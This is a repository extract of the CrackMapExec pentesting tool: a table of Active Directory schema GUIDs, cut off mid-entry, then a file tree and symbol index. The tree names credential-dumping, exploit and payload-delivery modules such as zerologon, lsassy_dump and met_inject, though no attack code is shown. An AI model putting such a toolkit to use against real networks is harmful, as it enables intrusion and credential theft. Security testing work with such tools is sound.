"bf967a70-0de6-11d0-a285-00aa003049e2": "USN-Created",
"1e02d2ef-44ad-46b2-a67d-9fd18d780bca": "ms-DS-Repl-Value-Meta-Data-Ext",
"963d2754-48be-11d1-a9c3-0000f80367c1": "dhcp-MaxKey",
"998b10f7-aa1a-4364-b867-753d197fe670": "ms-COM-DefaultPartitionLink",
"a4da7289-92a3-42e5-b6b6-dad16d280ac9": "ms-RADIUS-SavedFramedInterfaceId",
"f0f8ffa5-1191-11d0-a060-00aa006c33ed": "Phone-Office-Other",
"bf967a71-0de6-11d0-a285-00aa003049e2": "USN-DSA-Last-Obj-Removed",
"6055f766-202e-49cd-a8be-e52bb159edfb": "ms-DS-Drs-Farm-ID",
"09f0506a-cd28-11d2-9993-0000f87a57d4": "MS-SQL-OLAPCube",
"5ef243a8-2a25-45a6-8b73-08a71ae677ce": "ms-Kds-Prov-ServerConfiguration",
"963d2744-48be-11d1-a9c3-0000f80367c1": "dhcp-Obj-Description",
"430f678b-889f-41f2-9843-203b5a65572f": "ms-COM-ObjectId",
"f63ed610-d67c-494d-87be-cd1e24359a38": "ms-RADIUS-FramedIpv6Prefix",
"f0f8ffa4-1191-11d0-a060-00aa006c33ed": "Phone-Pager-Other",
"a8df7498-c5ea-11d1-bbcb-0080c76670c0": "USN-Intersite",
"b5f1edfe-b4d2-4076-ab0f-6148342b0bf6": "ms-DS-Issuer-Public-Certificates",
"963d2743-48be-11d1-a9c3-0000f80367c1": "dhcp-Obj-Name",
"09abac62-043f-4702-ac2b-6ca15eee5754": "ms-COM-PartitionLink",
"0965a062-b1e1-403b-b48d-5c0eb0e952cc": "ms-RADIUS-SavedFramedIpv6Prefix",
"f0f8ffa6-1191-11d0-a060-00aa006c33ed": "Phone-Pager-Primary",
"bf967a73-0de6-11d0-a285-00aa003049e2": "USN-Last-Obj-Rem",
"60686ace-6c27-43de-a4e5-f00c2f8d3309": "ms-DS-IsManaged",
"ca7b9735-4b2a-4e49-89c3-99025334dc94": "ms-TAPI-Rt-Conference",
"aa02fd41-17e0-4f18-8687-b2239649736b": "ms-Kds-Prov-RootKey",
"963d274f-48be-11d1-a9c3-0000f80367c1": "dhcp-Options",
"67f121dc-7d02-4c7d-82f5-9ad4c950ac34": "ms-COM-PartitionSetLink",
"5a5aa804-3083-4863-94e5-018a79a22ec0": "ms-RADIUS-FramedIpv6Route",
"9c979768-ba1a-4c08-9632-c6a5c1ed649a": "photo",
"167758ad-47f3-11d1-a9c3-0000f80367c1": "USN-Source",
"5315ba8e-958f-4b52-bd38-1349a304dd63": "ms-DS-Cloud-IsManaged",
"963d2753-48be-11d1-a9c3-0000f80367c1": "dhcp-Properties",
"9e6f3a4d-242c-4f37-b068-36b57f9fc852": "ms-COM-UserLink",
"9666bb5c-df9d-4d41-b437-2eec7e27c9b3": "ms-RADIUS-SavedFramedIpv6Route",
"bf9679f7-0de6-11d0-a285-00aa003049e2": "Physical-Delivery-Office-Name",
"4d2fa380-7f54-11d2-992a-0000f87a57d4": "Valid-Accesses",
"78565e80-03d4-4fe3-afac-8c3bca2f3653": "ms-DS-Cloud-Anchor",
"53ea1cb5-b704-4df9-818f-5cb4ec86cac1": "ms-TAPI-Rt-Person",
"7b8b558a-93a5-4af7-adca-c017e67f1057": "ms-DS-Group-Managed-Service-Account",
"963d2748-48be-11d1-a9c3-0000f80367c1": "dhcp-Ranges",
"8e940c8a-e477-4367-b08d-ff2ff942dcd7": "ms-COM-UserPartitionSetLink",
"3532dfd8-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Name",
"b7b13119-b82e-11d0-afee-0000f80367c1": "Physical-Location-Object",
"281416df-1968-11d0-a28f-00aa003049e2": "Vendor",
"a1e8b54f-4bd6-4fd2-98e2-bcee92a55497": "ms-DS-Cloud-Issuer-Public-Certificates",
"963d274a-48be-11d1-a9c3-0000f80367c1": "dhcp-Reservations",
"e85e1204-3434-41ad-9b56-e2901228fff0": "MS-DRM-Identity-Certificate",
"48fd44ea-ccee-11d2-9993-0000f87a57d4": "MS-SQL-RegisteredOwner",
"8d3bca50-1d7e-11d0-a081-00aa006c33ed": "Picture",
"bf967a76-0de6-11d0-a285-00aa003049e2": "Version-Number",
"89848328-7c4e-4f6f-a013-28ce3ad282dc": "ms-DS-Cloud-IsEnabled",
"50ca5d7d-5c8b-4ef3-b9df-5b66d491e526": "ms-WMI-IntRangeParam",
"e3c27fdf-b01d-4f4e-87e7-056eef0eb922": "ms-DS-Value-Type",
"963d2745-48be-11d1-a9c3-0000f80367c1": "dhcp-Servers",
"80863791-dbe9-4eb8-837e-7f0ab55d9ac7": "ms-DS-Additional-Dns-Host-Name",
"4f6cbdd8-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Contact",
"fc5a9106-3b9d-11d2-90cc-00c04fd91ab1": "PKI-Critical-Extensions",
"7d6c0e9a-7e20-11d0-afd6-00c04fd930c9": "Version-Number-Hi",
"b7acc3d2-2a74-4fa4-ac25-e63fe8b61218": "ms-DS-SyncServerUrl",
"963d2749-48be-11d1-a9c3-0000f80367c1": "dhcp-Sites",
"975571df-a4d5-429a-9f59-cdc6581d91e6": "ms-DS-Additional-Sam-Account-Name",
"561c9644-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Location",
"1ef6336e-3b9e-11d2-90cc-00c04fd91ab1": "PKI-Default-CSPs",
"7d6c0e9b-7e20-11d0-afd6-00c04fd930c9": "Version-Number-Lo",
"de0caa7f-724e-4286-b179-192671efc664": "ms-DS-User-Allowed-To-Authenticate-To",
"292f0d9a-cf76-42b0-841f-b650f331df62": "ms-WMI-IntSetParam",
"2eeb62b3-1373-fe45-8101-387f1676edc7": "ms-DS-Claims-Transformation-Policy-Type",
"963d2752-48be-11d1-a9c3-0000f80367c1": "dhcp-State",
"d3aa4a5c-4e03-4810-97aa-2b339e7a434b": "MS-DS-All-Users-Trust-Quota",
"5b5d448c-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Memory",
"426cae6e-3b9d-11d2-90cc-00c04fd91ab1": "PKI-Default-Key-Spec",
"1f0075fd-7e40-11d0-afd6-00c04fd930c9": "Vol-Table-GUID",
"2c4c9600-b0e1-447d-8dda-74902257bdb5": "ms-DS-User-Allowed-To-Authenticate-From",
"963d2746-48be-11d1-a9c3-0000f80367c1": "dhcp-Subnets",
"8469441b-9ac4-4e45-8205-bd219dbf672d": "ms-DS-Allowed-DNS-Suffixes",
"603e94c4-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Build",
"926be278-56f9-11d2-90d0-00c04fd91ab1": "PKI-Enrollment-Access",
"1f0075fb-7e40-11d0-afd6-00c04fd930c9": "Vol-Table-Idx-GUID",
"8521c983-f599-420f-b9ab-b1222bdf95c1": "ms-DS-User-TGT-Lifetime",
"07502414-fdca-4851-b04a-13645b11d226": "ms-WMI-MergeablePolicyTemplate",
"c8fca9b1-7d88-bb4f-827a-448927710762": "ms-DS-Claims-Transformation-Policies",
"963d273b-48be-11d1-a9c3-0000f80367c1": "dhcp-Type",
"800d94d7-b7a1-42a1-b14d-7cae1423d07f": "ms-DS-Allowed-To-Delegate-To",
"64933a3e-ccee-11d2-9993-0000f87a57d4": "MS-SQL-ServiceAccount",
"041570d2-3b9e-11d2-90cc-00c04fd91ab1": "PKI-Expiration-Period",
"34aaa217-b699-11d0-afee-0000f80367c1": "Volume-Count",
"105babe9-077e-4793-b974-ef0410b62573": "ms-DS-Computer-Allowed-To-Authenticate-To",
"963d273a-48be-11d1-a9c3-0000f80367c1": "dhcp-Unique-Key",
"c4af1073-ee50-4be0-b8c0-89a41fe99abe": "ms-DS-Auxiliary-Classes",
"696177a6-ccee-11d2-9993-0000f87a57d4": "MS-SQL-CharacterSet",
"18976af6-3b9e-11d2-90cc-00c04fd91ab1": "PKI-Extended-Key-Usage",
"244b2970-5abd-11d0-afd2-00c04fd930c9": "Wbem-Path",
"2e937524-dfb9-4cac-a436-a5b7da64fd66": "ms-DS-Computer-TGT-Lifetime",
"55dd81c9-c312-41f9-a84d-c6adbdf1e8e1": "ms-WMI-ObjectEncoding",
"641e87a4-8326-4771-ba2d-c706df35e35a": "ms-DS-Cloud-Extensions",
"963d2755-48be-11d1-a9c3-0000f80367c1": "dhcp-Update-Time",
"e185d243-f6ce-4adb-b496-b0c005d7823c": "ms-DS-Approx-Immed-Subordinates",
"6ddc42c0-ccee-11d2-9993-0000f87a57d4": "MS-SQL-SortOrder",
"e9b0a87e-3b9d-11d2-90cc-00c04fd91ab1": "PKI-Key-Usage",
"05308983-7688-11d1-aded-00c04fd8d5cd": "Well-Known-Objects",
"f2973131-9b4d-4820-b4de-0474ef3b849f": "ms-DS-Service-Allowed-To-Authenticate-To",
"bf967953-0de6-11d0-a285-00aa003049e2": "Display-Name",
"3e1ee99c-6604-4489-89d9-84798a89515a": "ms-DS-AuthenticatedAt-DC",
"72dc918a-ccee-11d2-9993-0000f87a57d4": "MS-SQL-UnicodeSortOrder",
"f0bfdefa-3b9d-11d2-90cc-00c04fd91ab1": "PKI-Max-Issuing-Depth",
"bf967a77-0de6-11d0-a285-00aa003049e2": "When-Changed",
"97da709a-3716-4966-b1d1-838ba53c3d89": "ms-DS-Service-Allowed-To-Authenticate-From",
"e2bc80f1-244a-4d59-acc6-ca5c4f82e6e1": "ms-WMI-PolicyTemplate",
"310b55ce-3dcd-4392-a96d-c9e35397c24f": "ms-DS-Device-Registration-Service-Container",
"bf967954-0de6-11d0-a285-00aa003049e2": "Display-Name-Printable",
"e8b2c971-a6df-47bc-8d6f-62770d527aa5": "ms-DS-AuthenticatedTo-Accountlist",
"7778bd90-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Clustered",
"1219a3ec-3b9e-11d2-90cc-00c04fd91ab1": "PKI-Overlap-Period",
"bf967a78-0de6-11d0-a285-00aa003049e2": "When-Created",
"5dfe3c20-ca29-407d-9bab-8421e55eb75c": "ms-DS-Service-TGT-Lifetime",
"9a7ad946-ca53-11d1-bbd0-0080c76670c0": "DIT-Content-Rules",
"503fc3e8-1cc6-461a-99a3-9eee04f402a7": "ms-DS-Az-Application-Data",
"7b91c840-ccee-11d2-9993-0000f87a57d4": "MS-SQL-NamedPipe",
"8447f9f1-1027-11d0-a05f-00aa006c33ed": "PKT",
"bf967a79-0de6-11d0-a285-00aa003049e2": "Winsock-Addresses",
"b23fc141-0df5-4aea-b33d-6cf493077b3f": "ms-DS-Assigned-AuthN-Policy-Silo",
"595b2613-4109-4e77-9013-a3bb4ef277c7": "ms-WMI-PolicyType",
"96bc3a1a-e3d2-49d3-af11-7b0df79d67f5": "ms-DS-Device-Registration-Service",
"fe6136a0-2073-11d0-a9c2-00aa006c33ed": "Division",
"db5b0728-6208-4876-83b7-95d3e5695275": "ms-DS-Az-Application-Name",
"8157fa38-ccee-11d2-9993-0000f87a57d4": "MS-SQL-MultiProtocol",
"8447f9f0-1027-11d0-a05f-00aa006c33ed": "PKT-Guid",
"bf967a7a-0de6-11d0-a285-00aa003049e2": "WWW-Home-Page",
"33140514-f57a-47d2-8ec4-04c4666600c7": "ms-DS-Assigned-AuthN-Policy-Silo-BL",
"f0f8ff8b-1191-11d0-a060-00aa006c33ed": "DMD-Location",
"7184a120-3ac4-47ae-848f-fe0ab20784d4": "ms-DS-Az-Application-Version",
"86b08004-ccee-11d2-9993-0000f87a57d4": "MS-SQL-SPX",
"19405b96-3cfa-11d1-a9c0-0000f80367c1": "Policy-Replication-Flags",
"9a9a0221-4a5b-11d1-a9c3-0000f80367c1": "WWW-Page-Other",
"164d1e05-48a6-4886-a8e9-77a2006e3c77": "ms-DS-AuthN-Policy-Silo-Members",
"45fb5a57-5018-4d0f-9056-997c8c9122d9": "ms-WMI-RangeParam",
"7c9e8c58-901b-4ea8-b6ec-4eb9e9fc0e11": "ms-DS-Device-Container",
"167757b9-47f3-11d1-a9c3-0000f80367c1": "DMD-Name",
"33d41ea8-c0c9-4c92-9494-f104878413fd": "ms-DS-Az-Biz-Rule",
"8ac263a6-ccee-11d2-9993-0000f87a57d4": "MS-SQL-TCPIP",
"281416c4-1968-11d0-a28f-00aa003049e2": "Port-Name",
"bf967a7b-0de6-11d0-a285-00aa003049e2": "X121-Address",
"11fccbc7-fbe4-4951-b4b7-addf6f9efd44": "ms-DS-AuthN-Policy-Silo-Members-BL",
"2df90d86-009f-11d2-aa4c-00c04fd7d83a": "DN-Reference-Update",
"52994b56-0e6c-4e07-aa5c-ef9d7f5a0e25": "ms-DS-Az-Biz-Rule-Language",
"8fda89f4-ccee-11d2-9993-0000f87a57d4": "MS-SQL-AppleTalk",
"bf9679fa-0de6-11d0-a285-00aa003049e2": "Poss-Superiors",
"d07da11f-8a3d-42b6-b0aa-76c962be719a": "x500uniqueIdentifier",
"cd26b9f3-d415-442a-8f78-7c61523ee95b": "ms-DS-User-AuthN-Policy",
"6afe8fe2-70bc-4cce-b166-a96f7359c514": "ms-WMI-RealRangeParam",
"d2b1470a-8f84-491e-a752-b401ee00fe5c": "ms-DS-AuthN-Policy-Silos",
"e0fa1e65-9b45-11d0-afdd-00c04fd930c9": "Dns-Allow-Dynamic",
"013a7277-5c2d-49ef-a7de-b765b36a3f6f": "ms-DS-Az-Class-ID",
"94c56394-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Vines",
"9a7ad94c-ca53-11d1-bbd0-0080c76670c0": "Possible-Inferiors",
"bf967a7f-0de6-11d0-a285-00aa003049e2": "X509-Cert",
"2f17faa9-5d47-4b1f-977e-aa52fabe65c8": "ms-DS-User-AuthN-Policy-BL",
"e0fa1e66-9b45-11d0-afdd-00c04fd930c9": "Dns-Allow-XFR",
"6448f56a-ca70-4e2e-b0af-d20e4ce653d0": "ms-DS-Az-Domain-Timeout",
"9a7d4770-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Status",
"bf9679fb-0de6-11d0-a285-00aa003049e2": "Post-Office-Box",
"612cb747-c0e8-4f92-9221-fdd5f15b550d": "UnixUserPassword",
"afb863c9-bea3-440f-a9f3-6153cc668929": "ms-DS-Computer-AuthN-Policy",
"3c7e6f83-dd0e-481b-a0c2-74cd96ef2a66": "ms-WMI-Rule",
"3a9adf5d-7b97-4f7e-abb4-e5b55c1c06b4": "ms-DS-AuthN-Policies",
"72e39547-7b18-11d1-adef-00c04fd8d5cd": "DNS-Host-Name",
"f90abab0-186c-4418-bb85-88447c87222a": "ms-DS-Az-Generate-Audits",
"9fcc43d4-ccee-11d2-9993-0000f87a57d4": "MS-SQL-LastUpdatedDate",
"bf9679fc-0de6-11d0-a285-00aa003049e2": "Postal-Address",
"850fcc8f-9c6b-47e1-b671-7c654be4d5b3": "UidNumber",
"2bef6232-30a1-457e-8604-7af6dbf131b8": "ms-DS-Computer-AuthN-Policy-BL",
"e0fa1e68-9b45-11d0-afdd-00c04fd930c9": "Dns-Notify-Secondaries",
"665acb5c-bb92-4dbc-8c59-b3638eab09b3": "ms-DS-Az-Last-Imported-Biz-Rule-Path",
"a42cd510-ccee-11d2-9993-0000f87a57d4": "MS-SQL-InformationURL",
"bf9679fd-0de6-11d0-a285-00aa003049e2": "Postal-Code",
"c5b95f0c-ec9e-41c4-849c-b46597ed6696": "GidNumber",
"2a6a6d95-28ce-49ee-bb24-6d1fc01e3111": "ms-DS-Service-AuthN-Policy",
"f1e44bdf-8dd3-4235-9c86-f91f31f5b569": "ms-WMI-ShadowObject",
"f9f0461e-697d-4689-9299-37e61d617b0d": "ms-DS-AuthN-Policy-Silo",
"675a15fe-3b70-11d2-90cc-00c04fd91ab1": "DNS-Property",
"5e53368b-fc94-45c8-9d7d-daf31ee7112d": "ms-DS-Az-LDAP-Query",
"a92d23da-ccee-11d2-9993-0000f87a57d4": "MS-SQL-ConnectionURL",
"bf9679fe-0de6-11d0-a285-00aa003049e2": "Preferred-Delivery-Method",
"a3e03f1f-1d55-4253-a0af-30c2a784e46e": "Gecos",
"2c1128ec-5aa2-42a3-b32d-f0979ca9fcd2": "ms-DS-Service-AuthN-Policy-BL",
"f60a8f96-57c4-422c-a3ad-9e2fa09ce6f7": "ms-DS-Device-MDMStatus",
"e0fa1e69-9b45-11d0-afdd-00c04fd930c9": "Dns-Record",
"cfb9adb7-c4b7-4059-9568-1ed9db6b7248": "ms-DS-Az-Major-Version",
"ae0c11b8-ccee-11d2-9993-0000f87a57d4": "MS-SQL-PublicationURL",
"856be0d0-18e7-46e1-8f5f-7ee4d9020e0d": "preferredLanguage",
"bc2dba12-000f-464d-bf1d-0808465d8843": "UnixHomeDirectory",
"b87a0ad8-54f7-49c1-84a0-e64d12853588": "ms-DS-Assigned-AuthN-Policy",
"6cc8b2b5-12df-44f6-8307-e74f5cdee369": "ms-WMI-SimplePolicyTemplate",
"a11703b7-5641-4d9c-863e-5fb3325e74e0": "ms-DS-GeoCoordinates-Altitude",
"bf967959-0de6-11d0-a285-00aa003049e2": "Dns-Root",
"ee85ed93-b209-4788-8165-e702f51bfbf3": "ms-DS-Az-Minor-Version",
"b222ba0e-ccee-11d2-9993-0000f87a57d4": "MS-SQL-GPSLatitude",
"bf9679ff-0de6-11d0-a285-00aa003049e2": "Preferred-OU",
"a553d12c-3231-4c5e-8adf-8d189697721e": "LoginShell",
"2d131b3c-d39f-4aee-815e-8db4bc1ce7ac": "ms-DS-Assigned-AuthN-Policy-BL",
"dc66d44e-3d43-40f5-85c5-3c12e169927e": "ms-DS-GeoCoordinates-Latitude",
"e0fa1e67-9b45-11d0-afdd-00c04fd930c9": "Dns-Secure-Secondaries",
"a5f3b553-5d76-4cbe-ba3f-4312152cab18": "ms-DS-Az-Operation-ID",
"b7577c94-ccee-11d2-9993-0000f87a57d4": "MS-SQL-GPSLongitude",
"52458022-ca6a-11d0-afff-0000f80367c1": "Prefix-Map",
"f8f2689c-29e8-4843-8177-e8b98e15eeac": "ShadowLastChange",
"7a560cc2-ec45-44ba-b2d7-21236ad59fd5": "ms-DS-AuthN-Policy-Enforced",
"ab857078-0142-4406-945b-34c9b6b13372": "ms-WMI-Som",
"94c42110-bae4-4cea-8577-af813af5da25": "ms-DS-GeoCoordinates-Longitude",
"d5eb2eb7-be4e-463b-a214-634a44d7392e": "DNS-Tombstoned",
"515a6b06-2617-4173-8099-d5605df043c6": "ms-DS-Az-Scope-Name",
"bcdd4f0e-ccee-11d2-9993-0000f87a57d4": "MS-SQL-GPSHeight",
"a8df744b-c5ea-11d1-bbcb-0080c76670c0": "Presentation-Address",
"a76b8737-e5a1-4568-b057-dc12e04be4b2": "ShadowMin",
"f2f51102-6be0-493d-8726-1546cdbc8771": "ms-DS-AuthN-Policy-Silo-Enforced",
"bd29bf90-66ad-40e1-887b-10df070419a6": "ms-DS-External-Directory-Object-Id",
"f18a8e19-af5f-4478-b096-6f35c27eb83f": "documentAuthor",
"2629f66a-1f95-4bf3-a296-8e9d7b9e30c8": "ms-DS-Az-Script-Engine-Cache-Max",
"c07cc1d0-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Version",
"963d2739-48be-11d1-a9c3-0000f80367c1": "Previous-CA-Certificates",
"f285c952-50dd-449e-9160-3b880d99988d": "ShadowMax",
"0bc579a2-1da7-4cea-b699-807f3b9d63a4": "ms-WMI-StringSetParam",
"0b21ce82-ff63-46d9-90fb-c8b9f24e97b9": "documentIdentifier",
"87d0fb41-2c8b-41f6-b972-11fdfd50d6b0": "ms-DS-Az-Script-Timeout",
"c57f72f4-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Language",
"963d273d-48be-11d1-a9c3-0000f80367c1": "Previous-Parent-CA",
"7ae89c9c-2976-4a46-bb8a-340f88560117": "ShadowWarning",
"2628a46a-a6ad-4ae0-b854-2b12d9fe6f9e": "account",
"bf967aa1-0de6-11d0-a285-00aa003049e2": "Mail-Recipient",
"b958b14e-ac6d-4ec4-8892-be70b69f7281": "documentLocation",
"7b078544-6c82-4fe9-872f-ff48ad2b2e26": "ms-DS-Az-Task-Is-Role-Definition",
"8386603c-ccef-11d2-9993-0000f87a57d4": "MS-SQL-Description",
"bf967a00-0de6-11d0-a285-00aa003049e2": "Primary-Group-ID",
"86871d1f-3310-4312-8efd-af49dcfb2671": "ShadowInactive",
"bf967a83-0de6-11d0-a285-00aa003049e2": "Class-Schema",
"d9a799b2-cef3-48b3-b5ad-fb85f8dd3214": "ms-WMI-UintRangeParam",
"59527d0f-b7c0-4ce2-a1dd-71cef6963292": "ms-DS-Is-Compliant",
"170f09d7-eb69-448a-9a30-f1afecfd32d7": "documentPublisher",
"8491e548-6c38-4365-a732-af041569b02c": "ms-DS-Az-Object-Guid",
"ca48eba8-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Type",
"c0ed8738-7efd-4481-84d9-66d2db8be369": "Primary-Group-Token",
"75159a00-1fff-4cf4-8bff-4ef2695cf643": "ShadowExpire",
"d1328fbc-8574-4150-881d-0b1088827878": "ms-DS-Key-Principal-BL",
"de265a9c-ff2c-47b9-91dc-6e6fe2c43062": "documentTitle",
"b5f7e349-7a5b-407c-a334-a31c3f538b98": "ms-DS-Az-Generic-Data",
"d0aedb2e-ccee-11d2-9993-0000f87a57d4": "MS-SQL-InformationDirectory",
"281416d7-1968-11d0-a28f-00aa003049e2": "Print-Attributes",
"8dfeb70d-c5db-46b6-b15e-a4389e6cee9b": "ShadowFlag",
"7f561288-5301-11d1-a9c5-0000f80367c1": "ACS-Policy",
"8f4beb31-4e19-46f5-932e-5fa03c339b1d": "ms-WMI-UintSetParam",
"c4a46807-6adc-4bbb-97de-6bed181a1bfe": "ms-DS-Device-Trust-Type",
"94b3a8a9-d613-4cec-9aad-5fbcc1046b43": "documentVersion",
"d31a8757-2447-4545-8081-3bb610cacbf2": "ms-DS-Behavior-Version",
"d5a0dbdc-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Database",
"281416cd-1968-11d0-a28f-00aa003049e2": "Print-Bin-Names",
"03dab236-672e-4f61-ab64-f77d2dc2ffab": "MemberUid",
"1dcc0722-aab0-4fef-956f-276fe19de107": "ms-DS-Shadow-Principal-Sid",
"7bfdcb7a-4807-11d1-a9c3-0000f80367c1": "Domain-Certificate-Authorities",
"f0d8972e-dd5b-40e5-a51d-044c7c17ece7": "ms-DS-Byte-Array",
"db77be4a-ccee-11d2-9993-0000f87a57d4": "MS-SQL-AllowAnonymousSubscription",
"281416d2-
gitextract_1_y4acn_/
├── .dockerignore
├── .github/
│ ├── ISSUE_TEMPLATE/
│ │ └── bug_report.md
│ └── workflows/
│ ├── crackmapexec-test.yml
│ └── crackmapexec.yml
├── .gitignore
├── .gitmodules
├── Dockerfile
├── LICENSE
├── Makefile
├── README.md
├── build_collector.py
├── cme/
│ ├── .hooks/
│ │ └── hook-lsassy.py
│ ├── __init__.py
│ ├── cli.py
│ ├── cmedb.py
│ ├── config.py
│ ├── connection.py
│ ├── console.py
│ ├── context.py
│ ├── crackmapexec.py
│ ├── data/
│ │ ├── cme.conf
│ │ ├── default.pem
│ │ ├── keepass_trigger_module/
│ │ │ ├── AddKeePassTrigger.ps1
│ │ │ ├── RemoveKeePassTrigger.ps1
│ │ │ └── RestartKeePass.ps1
│ │ ├── msol_dump/
│ │ │ └── msol_dump.ps1
│ │ ├── veeam_dump_module/
│ │ │ ├── veeam_dump_mssql.ps1
│ │ │ └── veeam_dump_postgresql.ps1
│ │ └── wmiexec_event_vbscripts/
│ │ ├── Exec_Command_Silent.vbs
│ │ └── Exec_Command_WithOutput.vbs
│ ├── first_run.py
│ ├── helpers/
│ │ ├── __init__.py
│ │ ├── bash.py
│ │ ├── bloodhound.py
│ │ ├── http.py
│ │ ├── logger.py
│ │ ├── misc.py
│ │ ├── msada_guids.py
│ │ └── powershell.py
│ ├── loaders/
│ │ ├── __init__.py
│ │ ├── moduleloader.py
│ │ └── protocolloader.py
│ ├── logger.py
│ ├── modules/
│ │ ├── IOXIDResolver.py
│ │ ├── MachineAccountQuota.py
│ │ ├── adcs.py
│ │ ├── add_computer.py
│ │ ├── appcmd.py
│ │ ├── bh_owned.py
│ │ ├── daclread.py
│ │ ├── dfscoerce.py
│ │ ├── drop-sc.py
│ │ ├── empire_exec.py
│ │ ├── enum_av.py
│ │ ├── enum_dns.py
│ │ ├── example_module.py
│ │ ├── find-computer.py
│ │ ├── firefox.py
│ │ ├── get-desc-users.py
│ │ ├── get_netconnections.py
│ │ ├── gpp_autologin.py
│ │ ├── gpp_password.py
│ │ ├── group_members.py
│ │ ├── groupmembership.py
│ │ ├── handlekatz.py
│ │ ├── hash_spider.py
│ │ ├── impersonate.py
│ │ ├── install_elevated.py
│ │ ├── keepass_discover.py
│ │ ├── keepass_trigger.py
│ │ ├── laps.py
│ │ ├── ldap-checker.py
│ │ ├── lsassy_dump.py
│ │ ├── masky.py
│ │ ├── met_inject.py
│ │ ├── ms17-010.py
│ │ ├── msol.py
│ │ ├── mssql_priv.py
│ │ ├── nanodump.py
│ │ ├── nopac.py
│ │ ├── ntdsutil.py
│ │ ├── ntlmv1.py
│ │ ├── petitpotam.py
│ │ ├── pi.py
│ │ ├── printnightmare.py
│ │ ├── procdump.py
│ │ ├── pso.py
│ │ ├── rdcman.py
│ │ ├── rdp.py
│ │ ├── reg-query.py
│ │ ├── runasppl.py
│ │ ├── scan-network.py
│ │ ├── scuffy.py
│ │ ├── shadowcoerce.py
│ │ ├── slinky.py
│ │ ├── spider_plus.py
│ │ ├── spooler.py
│ │ ├── subnets.py
│ │ ├── teams_localdb.py
│ │ ├── test_connection.py
│ │ ├── trust.py
│ │ ├── uac.py
│ │ ├── user_desc.py
│ │ ├── veeam_dump.py
│ │ ├── wcc.py
│ │ ├── wdigest.py
│ │ ├── web_delivery.py
│ │ ├── webdav.py
│ │ ├── whoami.py
│ │ ├── winscp_dump.py
│ │ ├── wireless.py
│ │ └── zerologon.py
│ ├── parsers/
│ │ ├── __init__.py
│ │ ├── ip.py
│ │ ├── nessus.py
│ │ └── nmap.py
│ ├── paths.py
│ ├── protocols/
│ │ ├── __init__.py
│ │ ├── ftp/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── ftp.py
│ │ ├── ldap/
│ │ │ ├── __init__.py
│ │ │ ├── bloodhound.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ ├── gmsa.py
│ │ │ ├── kerberos.py
│ │ │ ├── laps.py
│ │ │ └── proto_args.py
│ │ ├── ldap.py
│ │ ├── mssql/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ ├── mssqlexec.py
│ │ │ └── proto_args.py
│ │ ├── mssql.py
│ │ ├── rdp/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── rdp.py
│ │ ├── smb/
│ │ │ ├── __init__.py
│ │ │ ├── atexec.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ ├── firefox.py
│ │ │ ├── mmcexec.py
│ │ │ ├── passpol.py
│ │ │ ├── proto_args.py
│ │ │ ├── remotefile.py
│ │ │ ├── samrfunc.py
│ │ │ ├── samruser.py
│ │ │ ├── smbexec.py
│ │ │ ├── smbspider.py
│ │ │ └── wmiexec.py
│ │ ├── smb.py
│ │ ├── ssh/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── ssh.py
│ │ ├── vnc/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── vnc.py
│ │ ├── winrm/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── winrm.py
│ │ ├── wmi/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ ├── proto_args.py
│ │ │ ├── wmiexec.py
│ │ │ └── wmiexec_event.py
│ │ └── wmi.py
│ └── servers/
│ ├── __init__.py
│ ├── http.py
│ └── smb.py
├── crackmapexec.spec
├── flake.nix
├── pyproject.toml
├── shell.nix
└── tests/
├── README.md
├── data/
│ ├── test_key.priv
│ ├── test_passwords.txt
│ └── test_users.txt
├── e2e_commands.txt
├── e2e_test.py
└── test_smb_database.py
SYMBOL INDEX (1220 symbols across 146 files)
FILE: build_collector.py
function build_cme (line 19) | def build_cme():
function build_cmedb (line 72) | def build_cmedb():
FILE: cme/cli.py
function gen_cli_args (line 14) | def gen_cli_args():
FILE: cme/cmedb.py
class UserExitedProto (line 24) | class UserExitedProto(Exception):
function create_db_engine (line 28) | def create_db_engine(db_path):
function print_table (line 33) | def print_table(data, title=None):
function write_csv (line 42) | def write_csv(filename, headers, entries):
function write_list (line 59) | def write_list(filename, entries):
function complete_import (line 69) | def complete_import(text, line):
function complete_export (line 79) | def complete_export(text, line):
function print_help (line 97) | def print_help(help_string):
class DatabaseNavigator (line 101) | class DatabaseNavigator(cmd.Cmd):
method __init__ (line 102) | def __init__(self, main_menu, database, proto):
method do_exit (line 110) | def do_exit(self, line):
method help_exit (line 115) | def help_exit():
method do_back (line 121) | def do_back(self, line):
method do_export (line 124) | def do_export(self, line):
method help_export (line 413) | def help_export():
method do_import (line 425) | def do_import(self, line):
class CMEDBMenu (line 473) | class CMEDBMenu(cmd.Cmd):
method __init__ (line 474) | def __init__(self, config_path):
method write_configfile (line 496) | def write_configfile(self):
method do_proto (line 500) | def do_proto(self, proto):
method help_proto (line 518) | def help_proto():
method do_workspace (line 526) | def do_workspace(self, line):
method help_workspace (line 553) | def help_workspace():
method do_exit (line 560) | def do_exit(line):
method help_exit (line 564) | def help_exit():
